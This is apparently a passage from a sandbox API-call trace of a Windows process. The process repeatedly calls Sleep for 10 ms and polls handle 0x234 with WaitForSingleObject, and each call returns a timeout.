Sleep (dwMilliseconds=0xa) [0264.199] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.199] Sleep (dwMilliseconds=0xa) [0264.342] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.342] Sleep (dwMilliseconds=0xa) [0264.446] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.447] Sleep (dwMilliseconds=0xa) [0264.497] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.497] Sleep (dwMilliseconds=0xa) [0264.522] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.522] Sleep (dwMilliseconds=0xa) [0264.564] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.564] Sleep (dwMilliseconds=0xa) [0264.599] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.599] Sleep (dwMilliseconds=0xa) [0264.639] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.639] Sleep (dwMilliseconds=0xa) [0264.685] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.685] Sleep (dwMilliseconds=0xa) [0264.726] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.726] Sleep (dwMilliseconds=0xa) [0264.767] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.767] Sleep (dwMilliseconds=0xa) [0264.814] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.814] Sleep (dwMilliseconds=0xa) [0264.838] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.838] Sleep (dwMilliseconds=0xa) [0264.876] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.876] Sleep (dwMilliseconds=0xa) [0264.924] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.924] Sleep (dwMilliseconds=0xa) [0264.999] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0264.999] Sleep (dwMilliseconds=0xa) [0265.034] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.034] Sleep (dwMilliseconds=0xa) [0265.054] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.054] Sleep (dwMilliseconds=0xa) [0265.100] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.100] Sleep (dwMilliseconds=0xa) [0265.164] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.164] Sleep (dwMilliseconds=0xa) [0265.328] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.328] Sleep (dwMilliseconds=0xa) [0265.466] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.466] Sleep (dwMilliseconds=0xa) [0265.506] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.506] Sleep (dwMilliseconds=0xa) [0265.554] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.554] Sleep (dwMilliseconds=0xa) [0265.591] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.591] Sleep (dwMilliseconds=0xa) [0265.633] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.634] Sleep (dwMilliseconds=0xa) [0265.668] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.668] Sleep (dwMilliseconds=0xa) [0265.696] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.696] Sleep (dwMilliseconds=0xa) [0265.750] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.750] Sleep (dwMilliseconds=0xa) [0265.780] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.780] Sleep (dwMilliseconds=0xa) [0265.822] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.822] Sleep (dwMilliseconds=0xa) [0265.856] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.857] Sleep (dwMilliseconds=0xa) [0265.938] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.938] Sleep (dwMilliseconds=0xa) [0265.975] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0265.975] Sleep (dwMilliseconds=0xa) [0266.025] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.025] Sleep (dwMilliseconds=0xa) [0266.068] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.068] Sleep (dwMilliseconds=0xa) [0266.116] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.116] Sleep (dwMilliseconds=0xa) [0266.181] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.181] Sleep (dwMilliseconds=0xa) [0266.218] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.218] Sleep (dwMilliseconds=0xa) [0266.264] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.264] Sleep (dwMilliseconds=0xa) [0266.301] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.301] Sleep (dwMilliseconds=0xa) [0266.339] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.339] Sleep (dwMilliseconds=0xa) [0266.374] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.374] Sleep (dwMilliseconds=0xa) [0266.437] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.437] Sleep (dwMilliseconds=0xa) [0266.498] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.498] Sleep (dwMilliseconds=0xa) [0266.578] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.578] Sleep (dwMilliseconds=0xa) [0266.632] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.632] Sleep (dwMilliseconds=0xa) [0266.687] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.687] Sleep (dwMilliseconds=0xa) [0266.751] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.752] Sleep (dwMilliseconds=0xa) [0266.787] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.787] Sleep (dwMilliseconds=0xa) [0266.822] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.822] Sleep (dwMilliseconds=0xa) [0266.867] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.868] Sleep (dwMilliseconds=0xa) [0266.903] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.903] Sleep (dwMilliseconds=0xa) [0266.924] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.925] Sleep (dwMilliseconds=0xa) [0266.956] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.956] Sleep (dwMilliseconds=0xa) [0266.992] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0266.992] Sleep (dwMilliseconds=0xa) [0267.030] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.030] Sleep (dwMilliseconds=0xa) [0267.070] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.070] Sleep (dwMilliseconds=0xa) [0267.112] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.112] Sleep (dwMilliseconds=0xa) [0267.208] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.208] Sleep (dwMilliseconds=0xa) [0267.253] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.253] Sleep (dwMilliseconds=0xa) [0267.293] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.293] Sleep (dwMilliseconds=0xa) [0267.320] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.320] Sleep (dwMilliseconds=0xa) [0267.345] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.346] Sleep (dwMilliseconds=0xa) [0267.368] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.368] Sleep (dwMilliseconds=0xa) [0267.442] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.442] Sleep (dwMilliseconds=0xa) [0267.459] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.459] Sleep (dwMilliseconds=0xa) [0267.501] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.501] Sleep (dwMilliseconds=0xa) [0267.536] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.537] Sleep (dwMilliseconds=0xa) [0267.562] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.562] Sleep (dwMilliseconds=0xa) [0267.591] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.591] Sleep (dwMilliseconds=0xa) [0267.630] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.630] Sleep (dwMilliseconds=0xa) [0267.725] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.726] Sleep (dwMilliseconds=0xa) [0267.762] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.762] Sleep (dwMilliseconds=0xa) [0267.798] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.798] Sleep (dwMilliseconds=0xa) [0267.907] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.907] Sleep (dwMilliseconds=0xa) [0267.978] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0267.978] Sleep (dwMilliseconds=0xa) [0268.056] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.056] Sleep (dwMilliseconds=0xa) [0268.112] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.112] Sleep (dwMilliseconds=0xa) [0268.171] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.171] Sleep (dwMilliseconds=0xa) [0268.224] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.224] Sleep (dwMilliseconds=0xa) [0268.266] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.266] Sleep (dwMilliseconds=0xa) [0268.304] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.304] Sleep (dwMilliseconds=0xa) [0268.329] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.329] Sleep (dwMilliseconds=0xa) [0268.352] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.353] Sleep (dwMilliseconds=0xa) [0268.417] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.417] Sleep (dwMilliseconds=0xa) [0268.459] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.459] Sleep (dwMilliseconds=0xa) [0268.495] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.495] Sleep (dwMilliseconds=0xa) [0268.531] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.531] Sleep (dwMilliseconds=0xa) [0268.555] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.555] Sleep (dwMilliseconds=0xa) [0268.603] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.603] Sleep (dwMilliseconds=0xa) [0268.639] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.639] Sleep (dwMilliseconds=0xa) [0268.675] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.675] Sleep (dwMilliseconds=0xa) [0268.710] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.710] Sleep (dwMilliseconds=0xa) [0268.727] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.727] Sleep (dwMilliseconds=0xa) [0268.825] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.825] Sleep (dwMilliseconds=0xa) [0268.854] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.854] Sleep (dwMilliseconds=0xa) [0268.886] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.886] Sleep (dwMilliseconds=0xa) [0268.900] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.900] Sleep (dwMilliseconds=0xa) [0268.915] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.915] Sleep (dwMilliseconds=0xa) [0268.974] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.974] Sleep (dwMilliseconds=0xa) [0268.990] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0268.990] Sleep (dwMilliseconds=0xa) [0269.079] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.079] Sleep (dwMilliseconds=0xa) [0269.115] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.115] Sleep (dwMilliseconds=0xa) [0269.154] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.154] Sleep (dwMilliseconds=0xa) [0269.195] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.195] Sleep (dwMilliseconds=0xa) [0269.215] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.215] Sleep (dwMilliseconds=0xa) [0269.256] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.257] Sleep (dwMilliseconds=0xa) [0269.294] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.294] Sleep (dwMilliseconds=0xa) [0269.344] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.344] Sleep (dwMilliseconds=0xa) [0269.412] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.412] Sleep (dwMilliseconds=0xa) [0269.432] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.432] Sleep (dwMilliseconds=0xa) [0269.472] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.472] Sleep (dwMilliseconds=0xa) [0269.510] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.510] Sleep (dwMilliseconds=0xa) [0269.538] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.538] Sleep (dwMilliseconds=0xa) [0269.557] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.557] Sleep (dwMilliseconds=0xa) [0269.572] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.572] Sleep (dwMilliseconds=0xa) [0269.639] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.639] Sleep (dwMilliseconds=0xa) [0269.651] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.651] Sleep (dwMilliseconds=0xa) [0269.667] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.667] Sleep (dwMilliseconds=0xa) [0269.713] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.713] Sleep (dwMilliseconds=0xa) [0269.765] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.765] Sleep (dwMilliseconds=0xa) [0269.780] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.780] Sleep (dwMilliseconds=0xa) [0269.797] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.797] Sleep (dwMilliseconds=0xa) [0269.827] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.827] Sleep (dwMilliseconds=0xa) [0269.839] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.839] Sleep (dwMilliseconds=0xa) [0269.855] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.855] Sleep (dwMilliseconds=0xa) [0269.917] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.917] Sleep (dwMilliseconds=0xa) [0269.933] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.933] Sleep (dwMilliseconds=0xa) [0269.957] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.957] Sleep (dwMilliseconds=0xa) [0269.968] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.968] Sleep (dwMilliseconds=0xa) [0269.981] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.981] Sleep (dwMilliseconds=0xa) [0269.993] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0269.993] Sleep (dwMilliseconds=0xa) [0270.009] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.009] Sleep (dwMilliseconds=0xa) [0270.021] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.021] Sleep (dwMilliseconds=0xa) [0270.062] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.062] Sleep (dwMilliseconds=0xa) [0270.082] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.083] Sleep (dwMilliseconds=0xa) [0270.095] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.095] Sleep (dwMilliseconds=0xa) [0270.176] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.176] Sleep (dwMilliseconds=0xa) [0270.291] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.291] Sleep (dwMilliseconds=0xa) [0270.313] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.313] Sleep (dwMilliseconds=0xa) [0270.372] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.373] Sleep (dwMilliseconds=0xa) [0270.409] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.409] Sleep (dwMilliseconds=0xa) [0270.421] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.421] Sleep (dwMilliseconds=0xa) [0270.441] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.441] Sleep (dwMilliseconds=0xa) [0270.479] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.479] Sleep (dwMilliseconds=0xa) [0270.543] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.543] Sleep (dwMilliseconds=0xa) [0270.586] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.586] Sleep (dwMilliseconds=0xa) [0270.598] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.598] Sleep (dwMilliseconds=0xa) [0270.618] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.618] Sleep (dwMilliseconds=0xa) [0270.632] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.632] Sleep (dwMilliseconds=0xa) [0270.670] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.670] Sleep (dwMilliseconds=0xa) [0270.683] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.683] Sleep (dwMilliseconds=0xa) [0270.696] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.696] Sleep (dwMilliseconds=0xa) [0270.715] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.715] Sleep (dwMilliseconds=0xa) [0270.759] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.759] Sleep (dwMilliseconds=0xa) [0270.771] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.771] Sleep (dwMilliseconds=0xa) [0270.786] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.787] Sleep (dwMilliseconds=0xa) [0270.804] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.804] Sleep (dwMilliseconds=0xa) [0270.818] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.818] Sleep (dwMilliseconds=0xa) [0270.862] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.862] Sleep (dwMilliseconds=0xa) [0270.883] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.883] Sleep (dwMilliseconds=0xa) [0270.896] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.896] Sleep (dwMilliseconds=0xa) [0270.917] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.917] Sleep (dwMilliseconds=0xa) [0270.930] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.931] Sleep (dwMilliseconds=0xa) [0270.945] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.945] Sleep (dwMilliseconds=0xa) [0270.969] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.969] Sleep (dwMilliseconds=0xa) [0270.998] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0270.998] Sleep (dwMilliseconds=0xa) [0271.029] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.029] Sleep (dwMilliseconds=0xa) [0271.114] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.114] Sleep (dwMilliseconds=0xa) [0271.158] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.158] Sleep (dwMilliseconds=0xa) [0271.206] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.206] Sleep (dwMilliseconds=0xa) [0271.258] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.258] Sleep (dwMilliseconds=0xa) [0271.301] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.301] Sleep (dwMilliseconds=0xa) [0271.340] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.340] Sleep (dwMilliseconds=0xa) [0271.441] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.441] Sleep (dwMilliseconds=0xa) [0271.487] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.487] Sleep (dwMilliseconds=0xa) [0271.524] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.524] Sleep (dwMilliseconds=0xa) [0271.570] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.570] Sleep (dwMilliseconds=0xa) [0271.635] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.635] Sleep (dwMilliseconds=0xa) [0271.692] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.692] Sleep (dwMilliseconds=0xa) [0271.755] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.756] Sleep (dwMilliseconds=0xa) [0271.804] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.804] Sleep (dwMilliseconds=0xa) [0271.843] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.843] Sleep (dwMilliseconds=0xa) [0271.888] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.888] Sleep (dwMilliseconds=0xa) [0271.927] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0271.927] Sleep (dwMilliseconds=0xa) [0272.047] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.047] Sleep (dwMilliseconds=0xa) [0272.063] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.063] Sleep (dwMilliseconds=0xa) [0272.081] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.081] Sleep (dwMilliseconds=0xa) [0272.141] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.141] Sleep (dwMilliseconds=0xa) [0272.160] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.160] Sleep (dwMilliseconds=0xa) [0272.210] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.210] Sleep (dwMilliseconds=0xa) [0272.224] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.224] Sleep (dwMilliseconds=0xa) [0272.259] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.259] Sleep (dwMilliseconds=0xa) [0272.308] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.308] Sleep (dwMilliseconds=0xa) [0272.326] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.326] Sleep (dwMilliseconds=0xa) [0272.350] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.350] Sleep (dwMilliseconds=0xa) [0272.370] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.370] Sleep (dwMilliseconds=0xa) [0272.411] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.411] Sleep (dwMilliseconds=0xa) [0272.427] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.427] Sleep (dwMilliseconds=0xa) [0272.444] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.444] Sleep (dwMilliseconds=0xa) [0272.460] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.460] Sleep (dwMilliseconds=0xa) [0272.474] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.474] Sleep (dwMilliseconds=0xa) [0272.487] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.487] Sleep (dwMilliseconds=0xa) [0272.505] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.505] Sleep (dwMilliseconds=0xa) [0272.533] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.534] Sleep (dwMilliseconds=0xa) [0272.698] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.698] Sleep (dwMilliseconds=0xa) [0272.771] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.771] Sleep (dwMilliseconds=0xa) [0272.823] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0272.823] Sleep (dwMilliseconds=0xa) [0273.012] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.014] Sleep (dwMilliseconds=0xa) [0273.066] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.066] Sleep (dwMilliseconds=0xa) [0273.155] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.155] Sleep (dwMilliseconds=0xa) [0273.176] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.176] Sleep (dwMilliseconds=0xa) [0273.194] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.194] Sleep (dwMilliseconds=0xa) [0273.258] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.258] Sleep (dwMilliseconds=0xa) [0273.275] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.275] Sleep (dwMilliseconds=0xa) [0273.294] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.294] Sleep (dwMilliseconds=0xa) [0273.316] 